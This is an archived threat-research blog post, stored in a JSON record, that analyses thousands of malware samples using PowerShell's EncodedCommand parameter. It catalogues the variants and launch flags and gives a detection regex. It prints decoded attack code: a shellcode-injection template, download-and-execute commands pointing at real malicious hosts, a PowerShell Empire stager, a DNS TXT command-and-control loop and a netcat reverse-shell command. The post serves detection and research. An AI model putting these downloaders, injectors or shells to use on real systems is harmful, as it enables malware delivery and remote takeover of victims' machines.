{
	"id": "170636a0-ecd2-4311-b967-6070df5d9ebc",
	"created_at": "2026-04-06T00:15:38.062094Z",
	"updated_at": "2026-04-10T03:20:16.123308Z",
	"deleted_at": null,
	"sha1_hash": "c5f50fa4f8e7ea98d131b935b5f7b6677147d975",
	"title": "Pulling Back the Curtains on EncodedCommand PowerShell Attacks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 981272,
	"plain_text": "Pulling Back the Curtains on EncodedCommand PowerShell Attacks\r\nBy Jeff White\r\nPublished: 2017-03-10 · Archived: 2026-04-05 18:50:13 UTC\r\nA note to readers: The code samples included within this blog post may trigger alerts from your security software. Please\r\nnote that this does not indicate an infection or an attack; rather, it is a notification that the code could be malicious if it were\r\nlive.\r\nPowerShell has continued to gain in popularity over the past few years as the framework continues to mature, so it’s no\r\nsurprise we’re seeing it in more attacks. PowerShell offers attackers a wide range of capabilities natively on the system and\r\nwith a quick look at the landscape of malicious PowerShell tools flooding out; you have a decent indicator of its growth.\r\nMicrosoft has done a fantastic job in later versions of PowerShell by giving multiple ways to log PowerShell activity\r\n(Transcription, ScriptBlock, etc) so there has been a shift to try and further obfuscate attacks at runtime.\r\nEnter stage left - the PowerShell ‘-EncodedCommand’ parameter!\r\n-EncodedCommand\r\n    Accepts a base64-encoded string version of a command. Use this parameter\r\n    to submit commands to Windows PowerShell that require complex quotation\r\n    marks or curly braces.\r\nAs shown above from the PowerShell Help output, it’s a command intended to take complex strings that may otherwise\r\ncause issues for the command-line and wrap them up for PowerShell to execute. By masking the “malicious” part of your\r\ncommand from prying eyes you can avoid strings that may tip-off the defense.\r\nThe purpose of this blog will be two-fold. First, in the “Analysis Overview”, I will be analyzing 4,100 recent samples\r\nidentified within Palo Alto Networks AutoFocus that employ this EncodedCommand technique to see how PowerShell is\r\nbeing used and what techniques are being used in the wild for PowerShell attacks. Second, I will be using this blog to\r\ncatalog the PowerShell code with examples of each decoded sample to aide in future identification or research.\r\nAnalysis Overview\r\nTo perform this analysis, I needed to first identify samples that were using this technique. Because PowerShell gives you a\r\nlot of flexibility when it comes to calling different parameters, identifying samples isn’t as straightforward as one might\r\nexpect.\r\nBelow are three examples of different ways the EncodedCommand parameter can be called:\r\n1. Fully spelled out:\r\npowershell.exe –EncodedCommand ZQBjAGgAbwAgACIARABvAHIAbwB0AGgAeQAiAA==\r\n2. Truncated with alternate capitalization:\r\npowershell.exe –eNco ZQBjAGgAbwAgACIAVwBpAHoAYQByAGQAIgA=\r\n3. Using caret escape-character injection to break-up the string:\r\npowershell.exe –^e^C^ ZQBjAGgAbwAgACIAVwBpAHQAYwBoACIA\r\nThere are well over 100,000 variations possible by using combinations of these methods for the “EncodedCommand”\r\nparameter alone. Keeping that in mind, I came up with the below regex that gave decent coverage to the possible variants\r\nand could easily be applied to a huge corpus of dynamic analysis reports.\r\n\\-[Ee^]{1,2}[NnCcOoDdEeMmAa^]+ [A-Za-z0-9+/=]{5,}\r\nThis allows for extraction of lines like the below at scale for further analysis.\r\npowerShell.exe  -WindowStyle hiddeN -ExecuTionPolicy ByPasS -enc\r\ncgBlAGcAcwB2AHIAMwAyACAALwB1ACAALwBzACAALwBpADoAaAB0AHQAcAA6\r\nAC8ALwAxADkAMgAuADEANgA4AC4ANAA4AC4AMQAyADkALwB0AGUAcwB0AC4\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 1 of 35\n\nAagBwAGcAIABzAGMAcgBvAGIAagAuAGQAbABsAAoA\r\nNow, it’s no surprise but the majority of the encoded data is clearly generated from templates and public tools - attackers\r\naren’t re-inventing the wheel every time they need to run shellcode or download another malicious file.  This is evidenced\r\nby the fact that the underlying code is almost identical with just slight adjustments to download locations and the like. To try\r\nand perform analysis on the data then, I needed to try and identify the code and attempt to determine what generated the\r\ncode, or at minimum, attempt to cluster the code into like-buckets.\r\nProfiling Approach\r\nTo illustrate some of the difficulties involved with this, back in 2012 Matthew Graeber published a blog post about a\r\nPowerShell script he put together that could load shellcode into memory and execute it. This script has been the cornerstone\r\ntemplate for this technique, being used in most public tools that seek to use this functionality.\r\nFollowing are two iterations of the technique from TrustedSec tools Social-Engineer Toolkit (SET) and Magic Unicorn. If\r\nyou compare the two samples, you’ll see that SET uses “$c” whereas Magic Unicorn uses “$nLR” for the initial variable.\r\nSimilarly, the “$size” variable in SET is “$g” in Magic Unicorn, the “$sc” variable is “$z”, and finally the “$x” variable is\r\n“$kuss”.\r\nSET\r\n$c = '[DllImport(\"kernel32.dll\")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint\r\nflAllocationType, uint flProtect);[DllImport(\"kernel32.dll\")]public static extern IntPtr CreateThread(IntPtr\r\nlpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr\r\nlpThreadId);[DllImport(\"msvcrt.dll\")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);';$w = Add-Type -memberDefinition $c -Name \"Win32\" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = ;$size =\r\n0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le\r\n($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;)\r\n{Start-sleep 60};\r\nMagic Unicorn\r\n$nLR = '[DllImport(\"kernel32.dll\")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint\r\nflAllocationType, uint flProtect);[DllImport(\"kernel32.dll\")]public static extern IntPtr CreateThread(IntPtr\r\nlpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr\r\nlpThreadId);[DllImport(\"msvcrt.dll\")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);';$w = Add-Type -memberDefinition $nLR -Name \"Win32\" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = ;$g =\r\n0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$kuss=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le\r\n($z.Length-1);$i++) {$w::memset([IntPtr]($kuss.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$kuss,0,0,0);for\r\n(;;){Start-sleep 60};\r\nIn Magic Unicorn, there is a line within the generating script that randomizes some variables. Below is an excerpt showing\r\nhow this works.\r\nvar1 = generate_random_string(3, 4)\r\nvar2 = generate_random_string(3, 4)\r\npowershell_code = (\r\n        r\"\"\"$1 = '$c = ''[DllImport(\"kernel32.dll\")]public static extern IntPtr …\r\npowershell_code = powershell_code.replace(\"$1\", \"$\" + var1).replace(\"$c\", \"$\" + var2).replace(\"$2\", \"$\" + var3) …\r\nThis simply replaces some variables with a string of 3-4 random alphanumeric characters; however, not all variables get\r\nreplaced so the combination of the random string with known anchors allows me to theorize how it was generated.\r\nAlternatively, I can also see when it looks like this particular piece of code was copied into another tool without the\r\nrandomization part of the Magic Unicorn script as the variables don’t change or was further built upon by adding additional\r\nrandomization.\r\nIt’s not an exact science and, when dealing with code that has been heavily re-used over many years by many different\r\npeople, you’re bound to run into scenarios where the code just doesn’t lend itself well to profiling. I’ve attempted to classify\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 2 of 35\n\nit as accurately as possible but a word of caution - take the specific names with a grain of salt throughout this analysis as\r\nnothing is stopping someone simply copying and pasting the code into their own tool.\r\nIn total, I profiled 27 clusters of public tools or capabilities, which had unique identifiers to separate them apart from the\r\nrest. I’ll get into each of them later as I catalog each variant but, for now, the below table offers a breakdown of the variants,\r\nhow many samples matched, and the overall percentage it accounted for in the sample set.\r\nVariant Count % of Total\r\nDownloader DFSP 1,373 33.49%\r\nShellcode Inject 1,147 27.98%\r\nUnicorn 611 14.90%\r\nPowerShell Empire 293 7.15%\r\nSET 199 4.85%\r\nUnknown 104 2.54%\r\nPowerfun Reverse 100 2.44%\r\nDownloader DFSP 2X 81 1.98%\r\nDownloader DFSP DPL 24 0.59%\r\nDownloader IEXDS 19 0.46%\r\nPowerWorm 19 0.46%\r\nUnicorn Modified 14 0.34%\r\nScheduled Task COM 11 0.27%\r\nBITSTransfer 11 0.27%\r\nVB Task 10 0.24%\r\nTXT C2 10 0.24%\r\nDownloader Proxy 9 0.22%\r\nAMSI Bypass 8 0.20%\r\nVeil Stream 7 0.17%\r\nMeterpreter RHTTP 6 0.15%\r\nDynAmite Launcher 6 0.15%\r\nDownloader Kraken 5 0.12%\r\nAppLocker Bypass 4 0.10%\r\nPowerSploit GTS 3 0.07%\r\nPowerfun Bind 2 0.05%\r\nRemove AV 2 0.05%\r\nDynAmite KL 1 0.02%\r\nOver half of the samples analyzed utilized either a generic “DownloadFile-StartProcess” technique or a variant of the\r\nshellcode injection technique shown previously.\r\nGeneral Distribution / Stats\r\nAcross the 4,100 samples, there were 4 file formats seen.\r\nFile Format Count % of Total\r\n\"exe\" 2,154 52.54%\r\n\"doc\" 1,717 41.88%\r\n\"xls\" 228 5.56%\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 3 of 35\n\n\"dll\" 1 0.02%\r\nEXE and DOC format account for the majority of extensions used across this sample set. Looking further at the DOC files,\r\n77% of them, 1,326, matched the “Downloader DFSP” variant, which defines a generic downloader using the\r\nDownloadFile-StartProcess method as shown below.\r\n(New-Object\r\nSystem.Net.WebClient).DownloadFile('http://94.102.53.238/~yahoo/csrsv.exe',\"$env:APPDATA\\csrsv.exe\");Start-Process (\"$env:APPDATA\\csrsv.exe\")\r\nPivoting from there, 1,159 of the DOC files (87%) match known patterns for Cerber ransomware; the implication is that a\r\ntool is being used to generate the malicious Microsoft Word Documents that create the macro which launches PowerShell\r\nwith this technique as the template.\r\nThe primary method of delivery across the DOC samples is SMTP/POP3, which aligns with the status quo of delivering\r\nransomware by using malicious Microsoft Word Documents via e-mail campaigns.\r\nFigure 1 Applications used to deliver malicious Powershell Word Documents\r\nLooking at the target industries also shows a fairly even distribution throughout Higher Education, High Tech, Professional\r\nand Legal Services, and Healthcare.\r\nFigure 2 Breakdown of Industries detecting malicious Powershell Word Documents\r\nA quick look at the distribution over time also shows a number of large spikes that, again, aligns with the standard operating\r\nprocedure of e-mail campaigns.\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 4 of 35\n\nFigure 3 Number of malicious Powershell Word Documents captured in AutoFocus over the last 12 months\r\nLooking at how the EXE samples were classified, nothing stands out as being dominant in terms of a group or malware\r\nfamily; however, interestingly enough there seems to be a preference for targeting companies in the High Tech industry.\r\nFigure 4 Breakdown of Industries detecting malicious Executables using Powershell\r\nThe distribution over time is also fairly even in comparison to the DOC sample distribution over time.\r\nFigure 5 Number of malicious Executables using Powershell captured in AutoFocus over the last 12 months\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 5 of 35\n\nOne possible explanation for this is a variation is distribution. For example, while DOC samples were primarily seen as\r\nattachments to e-mail, EXE samples were usually delivered through Web Browsing.\r\nThe last item I’ll touch on before diving into the commands themselves is the one DLL file that was detected using the\r\nEncodedCommand technique. This DLL contains no exports but when called with the DLLMain entry point will simply\r\nlaunch a PowerShell Empire stager which downloads an XOR’d script from a website and then uses PowerShell’s Invoke-Expression cmdlet to run the downloaded script. This sample was related to the Odinaff family that Symantec blogged about\r\nin October 2016.\r\nPre-Analysis Data / Stats\r\nBefore looking at the base64 encoded data, I looked at how each process was launched. This frequency analysis and\r\ninspection gives some insight into what additional parameters are being used alongside EncodedCommand.\r\nEncodedCommand: (4,100 Samples – 100% Coverage)\r\nUsed to pass a base64 encoded string to PowerShell for execution.\r\nFlag Count % of Total\r\n\"-enc\" 3,407 83.29%\r\n\"-Enc\" 412 10.05%\r\n\"-EncodedCommand\" 229 5.59%\r\n\"-encodedcommand\" 40 0.98%\r\n\"-encodedCommand\" 7 0.17%\r\n\"-ec\" 3 0.07%\r\n\"-en\" 1 0.02%\r\n\"-ENC\" 1 0.02%\r\nWindowStyle Hidden: (2,083 Samples – 50.8% Coverage)\r\nUsed to prevent PowerShell from displaying a window when it executes code. The most used variant “-window hidden” is\r\ndue to the PowerShell command that the previously mentioned Microsoft Word Documents distributing Cerber are using.\r\nFlag Count % of Total\r\n\"-window hidden\" 1,267 30.90%\r\n\"-W Hidden\" 315 7.68%\r\n\"-w hidden\" 159 3.88%\r\n\"-windowstyle hidden\" 125 3.05%\r\n\"-win hidden\" 67 1.63%\r\n\"-WindowStyle Hidden\" 45 1.10%\r\n\"-win Hidden\" 42 1.02%\r\n\"-wind hidden\" 40 0.98%\r\n\"-WindowStyle hidden\" 5 0.12%\r\n\"-WindowStyle hiddeN\" 5 0.12%\r\n\"-windows hidden\" 4 0.10%\r\n\"-Win Hidden\" 3 0.07%\r\n\"-win hid\" 2 0.05%\r\n\"-Window hidden\" 2 0.05%\r\n\"-Wind Hidden\" 1 0.02%\r\n\"-Win hidden\" 1 0.02%\r\nNonInteractive: (1,405 Samples – 42.4% Coverage)\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 6 of 35\n\nUsed to prevent creating an interactive prompt for the user. Used in combination with WindowStyle Hidden to hide signs of\r\nexecution. For the “-noni” variation, 76% were the generic shellcode injection code and SET, whereas “-NonI” was\r\nPowerShell Empire.\r\nFlag Count % of Total\r\n\"-noni\" 1,042 25.41%\r\n\"-NonI\" 331 8.07%\r\n\"-noninteractive\" 27 0.66%\r\n\"-NonInteractive\" 4 0.10%\r\n\"-nonI\" 1 0.02%\r\nNoProfile: (1,350 Samples – 32.9% Coverage)\r\nPrevents PowerShell from loading profile scripts, which get executed on launch, so as to avoid potentially unwanted\r\ncommands or settings. Similar to the breakdown for NonInteractive, “-nop” is primarily SET and the generic shellcode\r\ninjection while “-NoP” is PowerShell Empire.\r\nFlag Count % of Total\r\n\"-nop\" 955 23.29%\r\n\"-NoP\" 332 8.10%\r\n\"-noprofile\" 57 1.39%\r\n\"-NoProfile\" 5 0.12%\r\n\"-noP\" 1 0.02%\r\nExecutionPolicy ByPass: (453 Samples – 11% Coverage)\r\nBypasses the default PowerShell script execution policy (Restricted) and will not block the execution of any scripts or create\r\nany prompts. It’s interesting to note that the code executed within EncodedCommand parameter does not apply to the\r\nexecution policy.\r\nFlag Count % of Total\r\n\"-ep bypass\" 128 3.12%\r\n\"-exec bypass\" 80 1.95%\r\n\"-executionpolicy bypass\" 78 1.90%\r\n\"-Exec Bypass\" 73 1.78%\r\n\"-ExecutionPolicy ByPass\" 42 1.02%\r\n\"-ExecutionPolicy bypass\" 26 0.63%\r\n\"-Exec ByPass\" 9 0.22%\r\n\"-ExecutionPolicy Bypass\" 5 0.12%\r\n\"-ExecuTionPolicy ByPasS\" 4 0.10%\r\n\"-exe byPass\" 2 0.05%\r\n\"-ep Bypass\" 2 0.05%\r\n\"-ExecutionPolicy BypasS\" 2 0.05%\r\n\"-Exe ByPass\" 2 0.05%\r\nSta: (219 Samples - 5.3% Coverage)\r\nUses single-threaded apartment (now default as of PowerShell 3.0). This parameter was almost exclusively used in\r\nPowerShell Empire.\r\nFlag Count % of Total\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 7 of 35\n\n\"-sta\"  219  5.34%\r\nNoExit: (23 Samples - 0.5% Coverage)\r\nPrevents PowerShell from exiting after running the startup commands. This was exclusively used by the PowerWorm\r\nmalware and was the only parameter used beside EncodedCommand.\r\nFlag Count % of Total\r\n\"-noexit\"  23  0.56%\r\nExecutionPolicy Hidden (5 Samples - 0.12% Coverage)\r\nThis actually isn’t a valid policy so PowerShell just ignores it. Every usage of it is related to a script I labeled “TXT C2”,\r\nwhich attempts to load a DNS TXT Record containing another PowerShell script, similar to PowerWorm. Most likely, the\r\nattacker meant to use ByPass here as they already have “-w hidden” later in their command.\r\nFlag Count % of Total\r\n\"-ep hidden\"  5  0.12%\r\nNoLogo: (33 Samples - 0.8% Coverage)\r\nHides the copyright banner when PowerShell launches.\r\nFlag Count % of Total\r\n\"-Nol\" 10 0.24%\r\n\"-NoL\" 10 0.24%\r\n\"-nologo\" 9 0.22%\r\n\"-nol\" 4 0.10%\r\nExecutionPolicy Unrestricted (1 Samples – 0.02% Coverage)\r\nSimilar to ByPass, but will warn the user before running unsigned scripts downloaded from the Internet. The underlying\r\nlone script that used this parameter tries to execute a script downloaded from the Internet, which should generate a warning.\r\nFlag Count % of Total\r\n\"-ExecutionPolicy Unrestricted\"  1  0.02%\r\nCommand (1 Samples – 0.02% Coverage)\r\nExecutes a command that follows the parameter as if they were typed at the PowerShell prompt. I only saw one instance of\r\nthis and it was tied directly to a piece of malware that FireEye included in a blog about evading signature-based detections.\r\nThe PowerShell code is included in the “Comments” field of a DOCM file and launched from a macro inside a Microsoft\r\nWord document. Below is the code in question that chains together multiple commands to perform an FTP transfer and\r\nsubsequent NetCat connection.\r\npowershell -noP -nonI -Win hidden -c sc ftp.txt -val \\\"open\\\" -enc ascii; ac ftp.txt -val \\\"192.168.52.129\\\" -enc ascii;\r\nac ftp.txt -val \\\"test\\\" -enc ascii; ac ftp.txt -val \\\"test\\\" -enc ascii; ac ftp.txt -val \\\"bin\\\" -enc ascii; ac ftp.txt -val\r\n\\\"GET\\\" -enc ascii; ac ftp.txt -val \\\"nc.exe\\\" -enc ascii; ac ftp.txt -val \\\"nc.exe\\\" -enc ascii; ac ftp.txt -val \\\"bye\\\" -enc\r\nascii; ftp -s:ftp.txt; rm ftp.txt; ./nc.exe -e powershell.exe 192.168.52.129 3724\r\nFlag Count % of Total\r\n\"-c\"  1  0.02%\r\nFinally, I’ll end the parameter analysis by looking briefly at the top 10 combinations seen throughout this sample set.\r\nFlag Combination Count % of Total\r\n\"-window hidden -enc\" 1,242 30.29%\r\n\"-enc\" 986 24.04%\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 8 of 35\n\n\"-nop -noni -enc\" 736 17.95%\r\n\"-NoP -sta -NonI -W Hidden -Enc\" 206 5.02%\r\n\"-EncodedCommand\" 169 4.12%\r\n\"-ep bypass -noni -w hidden -enc\" 102 2.48%\r\n\"-NoP -NonI -W Hidden -Enc\" 60 1.46%\r\n\"-nop  -win hidden -noni -enc\" 57 1.39%\r\n\"-executionpolicy bypass -windowstyle hidden -enc\" 51 1.24%\r\n\"-nop -exec bypass -win Hidden -noni -enc\" 41 1.00%\r\nEven accounting for changes in case, the results only increase by a handful of samples in each category.\r\nWhile doing the research to try and identify unique signatures for identification, I found multiple examples of the below,\r\nwherein the code author changes the parameters for a newer version of their tool.\r\nFigure 6 Code Author Modified parameters between versions of a tool\r\nThis reduces the overall aggregate count for those families but I don’t believe it has much impact on the totals. In my review\r\nof the tools, authors are less focused on the dynamic ordering of the parameters or potentially dynamically adjusting\r\nparameter length to further obscure their attacks; instead they add in basic capitalization randomization and focus on the\r\n“meat” of their code. This can allow for some low-fidelity profiling based on just the way the PowerShell command is\r\nlaunched.\r\nIn addition, the top three combinations, which account for 72% of all combinations, are predominately straightforward and\r\nfocused on just running code versus any clever attempts at further hiding their attacks from the user.\r\nPost-Analysis Data / Stats\r\nNext I’ll go over each of the identified variants and review their functionality. For each one that downloads a file or script,\r\nI’ll include the observed IP/Domain/URL at the end of this blog. Some of these may be malicious, some of them may be\r\npentesters, and some of them may be people doing random testing of new techniques; unfortunately, it’s not usually possible\r\nto infer intention when doing bulk analysis but the data is provided for the reader to use as they see fit.\r\nDownloaders\r\nPowerShell code identified with the primary intention of downloading and running a secondary payload or executing\r\nPowerShell code obtained remotely.\r\nDownloader DFSP (1,373 Samples - 33.49% Coverage)\r\nThis is a quintessential example of using PowerShell to download and run a file. It’s basically verbatim of the results you get\r\nwhen using Google to search for ways to download and run a file. As such, I’ve used the below template as a generic\r\nclassification for the base64 encoded data that acts as a simple downloader for the true payload.\r\n(New-Object System.Net.WebClient).DownloadFile('http://cajos[.]in/0x/1.exe','mess.exe');Start-Process 'mess.exe'\r\nAs was previously pointed out, almost all of the detections matching this category were linked back to the Microsoft Word\r\ndocuments launching this PowerShell command via a macro to download Cerber. One unique pattern observed in this\r\nsample was the usage of environment variables, in addition to their URI pattern.\r\nDownloader for Cerber –\r\n(New-Object\r\nSystem.Net.WebClient).DownloadFile('http://94.102.53[.]238/~yahoo/csrsv.exe',\"$env:APPDATA\\csrsv.exe\");Start-Process (\"$env:APPDATA\\csrsv.exe\")\r\nPowerShell Empire (293 Samples – 7.15% Coverage)\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 9 of 35\n\nFor this next one, the samples are using PowerShell Empire’s EncryptedScriptDropper to download a script remotely and\r\ndecrypt it with an embedded XOR key.\r\n$Wc=NeW-ObjeCt SySTEM.Net.WebCLiEnt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like\r\nGecko';$WC.HeadeRS.ADd('User-Agent',$u);$wc.PrOxy =\r\n[SyStem.NeT.WEbReQUeSt]::DEFauLTWeBProxy;$WC.PRoXY.CrEdENTIaLS =\r\n[SYStEM.NeT.CReDEnTiALCaChE]::DEFaulTNeTworKCREdeNtiaLS;$K='0192023a7bbd73250516f069df18b500';$i=0;\r\n[CHAr[]]$B=([CHaR[]]($wc.DOwnloaDSTRing(\"http://23.239.12.15:8080/index.asp\")))|%{$_-\r\nBXOr$k[$i++%$K.LENgTh]};IEX ($B-jOIn'')\r\nIn this example, the XOR key is “0192023a7bbd73250516f069df18b500” and the pulled down script, once decoded with\r\nthat key, is the PowerShell Empire agent stager script that will POST system information to the C2 server and then\r\ndownload the encrypted Stage 1 Empire payload.\r\n'FunCtION StaRt-NegoTiATe{param($s,$SK,$UA=\"lol\")Add-TypE -AsSeMBLY SYSteM.SECUriTY;AdD-TypE -aSSEMBly SYSTEm.CoRe;$Err\r\n\"SilentlyContinue\";$E=[SYstem.TExT.ENCoDING]::ASCII;$AES=NeW-OBjecT SYsTeM.SeCURiTy.CRyptoGrapHY.AESCRyPToSeRVicePrOvI\r\nRandOm -coUNt 16;$AES.Mode=\"CBC\"; $AES.Key=$e.GetBytes($SK); $AES.IV = $IV;$cSp = NEW-OBJECT SYStEM.SecURity.CrYPtOGRA\r\n$cSP.FlagS -boR [SYsTeM.SeCurITY.CryptogRaphy.CsPPROViDErFlAGs]::UsEMAcHINEKeySTore;$Rs = NEW-ObJecT\r\nSySTEm.SecURIty.CRyptograPHy.RSACRYPTOSERvICEPROViDeR -ARGuMenTLIsT 2048,$CSP;$rk=$Rs.TOXMlStriNg($FALse);$r=1..16|FO\r\nMAx 26};$ID=(\\'ABCDEFGHKLMNPRSTUVWXYZ123456789\\'[$r] -joIN\r\n\\'\\');$iB=$E.gEtbYTes($Rk);$eb=$IV+$AES.CReaTeENCRyptoR().TRANSFoRmFiNalBLOcK($Ib,0,$Ib.LENgtH);IF(-Not $wc){$wc=nEw-oBJE\r\nsYstEM.Net.WEBCLient;$WC.ProxY = [SySTem.NET.WeBReqUEsT]::GETSysTeMWEbPRoxY();$Wc.Proxy.CrEDentIals =\r\n[SYStem.Net.CredENtIalCAche]::DEFAUlTCRedentIaLs;}$wc.Headers.Add(\"User-Agent\",$UA);$wc.Headers.Add(\"Cookie\",\"SESSIONID=$ID\");$raw=$wc.UploadData($s+\"index.jsp\",\"POST\",$eb);$dE=$E.GETSTRing($Rs.deC\r\n-joIN\\'\\';$KeY=$dE[10..$de.LengTH] -jOIn \\'\\';$AES=NEw-ObJEct SYsTEm.SEcurity.CRyPtoGRAPHY.AEsCrYPtOSerVIcEPRoVidEr;$IV = [By\r\n16;$AES.Mode=\"CBC\"; $AES.Key=$e.GetBytes($key); $AES.IV = $IV;$i=$S+\\'|\\'+[EnvIrONment]::UsERDOmAInNAmE+\\'|\\'+[ENvIRonmeNt]:\r\n[ENvIRONmeNt]::MaChinEName;$P=(gwMi WIN32_NeTWorkAdAPTErCoNfIGurAtioN|WherE{$_.IPAdDRess}|SelECt -ExpANd IPADDReSS\r\n[$P.LeNgTh -lt 6];If(!$IP -or $ip.trIm() -EQ \\'\\') {$Ip=\\'0.0.0.0\\'};$i+=\"|$ip\";$I+=\\'|\\'+(GEt-WmIOBJect WIn32_OpERAtiNgSystEM).NAME.splIT(\r\n[0];if(([Environment]::UserName).ToLower() -eq \"system\"){$i+=\\'|True\\'}else {$i += \"|\" +([Security.Principal.WindowsPrincipal]\r\n[Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] \"Administrator\")}$n=\r\n[SySTeM.DIAgNoSTICS.ProceSS]::GetCUrREntPRocEss();$i+=\\'|\\'+$n.PROCEssNAMe+\\'|\\'+$n.ID;$I += \\'|\\' +\r\n$PSVerSIOnTabLe.PSVerSioN.MAjOR;$ib2=$E.getbYteS($I);$EB2=$IV+$AES.CrEATEEncrYPToR().TrANSFORmFinALBLOCk($Ib2,0,$Ib2.L\r\nAgent\",$UA);$raw=$wc.UploadData($s+\"index.php\",\"POST\",$eb2);$AES=NeW-Object SYSteM.SEcuRIty.CRYPToGrapHY.AesCrYPToSeRVIcE\r\n$rAw[0..15];$AES.Key=$e.GETBYtes($key);$AES.IV = $IV;IEX $([SYstEM.TeXt.EnCoDInG]::ASCII.GetStrInG(\r\n$($AES.CrEateDECRYpTOr().TRANsFOrMFinAlBloCk($rAW[16..$RaW.LENGtH],0,$raw.LENGth-16))));$AES=$NuLL;$s2=$NuLl;$WC=$nUll;$eB2=$nULl;$RAW=$NuLl;$IV=$NULL;$WC=$NULl;$I=$NUlL;$iB2=$null;[GC]::COlLEcT();In\r\n[0..2] -join \"/\") -SessionKey $key -SessionID $ID -Epoch $epoch;} Start-Negotiate -s \"http://23.239.12.15:8080/\" -SK \\'0192023a7bbd73250516f06\r\nDownloader DFSP 2X (81 Samples - 1.98% Coverage)\r\nThis is the same as the previous downloader but it launches yet another instance of PowerShell to carry out the download.\r\nThese were all linked to the Cerber downloader documents as well.\r\nPowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object\r\nSystem.Net.WebClient).DownloadFile('http://93.174.94[.]135/~kali/ketty.exe', $env:APPDATA\\profilest.exe );Start-Process ( $env:APPDATA\\profilest.exe )\r\nDownloader DFSP DPL (24 Samples - 0.59% Coverage)\r\nAnother downloader using the DownloadFile -\u003e Start-Process technique that had two different variations within the sample\r\nset. A number of these samples matched behaviors related to Bartalex and may be indicative of changes to this well-known\r\nOffice Macro generator.\r\nUnabridged –\r\n($deploylocation=$env:temp+'fleeb.exe');(New-Object\r\nSystem.Net.WebClient).DownloadFile('http://worldnit[.]com/abu.exe', $deploylocation);Start-Process\r\n$deploylocation\r\nAbridged –\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 10 of 35\n\n($dpl=$env:temp+'f.exe');(New-Object System.Net.WebClient).DownloadFile('http://alonqood[.]com/abacom.exe',\r\n$dpl);Start-Process $dpl\r\nDownloader IEXDS (19 Samples – 0.46% Coverage)\r\nThis is another spin on a downloader that frequently pops-up when searching for methods to download and execute scripts\r\nfor PowerShell. Effectively, the code simply downloads a PowerShell script remotely and executes it with Invoke-Expression. The resulting payloads can be quite different from one another and didn’t seem related.\r\nThe following two samples download an “Invoke-TwitterBot” script, which is “A Trojan bot controlled by a twitter account\r\nthat was released at ShmooCon IX”.\r\nIEX (New-Object Net.WebClient).DownloadString('http://cannot.loginto[.]me/googlehelper.ps1')\r\niex ((New-Object Net.WebClient).DownloadString('http://76.74.127[.]38/default-nco.html'))\r\nBITSTransfer (11 Samples – 0.27% Coverage)\r\nAnother mechanism for downloading malware via PowerShell is through the BitsTransfer module. Background Intelligent\r\nTransfer Service (BITS) isn’t as frequently seen in downloading malware but offers similar functionality to other known\r\ntransfer services, such as HTTP. Using this different method may allow attackers to avoid certain monitoring and take\r\nadvantage of the fact that BITS will throttle transfers to not impact other bandwidth usage.\r\nIn my previous blog, I noted that a variant of the Cerber downloader was seen using BITS for a brief period of time and 10\r\nout of these 11 samples were Microsoft Word documents leading to Cerber.\r\nImport-Module BitsTransfer\r\n$path = [environment]::getfolderpath(\"mydocuments\")\r\nStart-BitsTransfer -Source \"http://94.102.50[.]39/keyt.exe\" -Destination \"$path\\keyt.exe\"\r\nInvoke-Item  \"$path\\keyt.exe\"\r\nTXT C2 (10 Samples – 0.24% Coverage)\r\nFor this next one, the attacker uses PowerShell to make a DNS query for the TXT record of a domain. The TXT record\r\ncontains another PowerShell script that is then passed to Invoke-Expression to execute.\r\nif(''+(nslookup -q=txt p.s.os.ns.rankingplac[.]pl) -match '@(.*)@'){iex $matches[1]}\r\nLooking at the script which is returned shows that once this initial look-up occurs, it will set itself into a constant loop\r\ncontinuing to query for the TXT record of the domain and base64 decoding then executing the result.\r\nNon-authoritative answer:\r\np.s.os.ns.rankingplac.pl text = \"@$str=''\\;$i=1\\;while(1){if(''+(nslookup -q=txt \\\"l.$i.ns.rankingplac[.]pl.\\\") 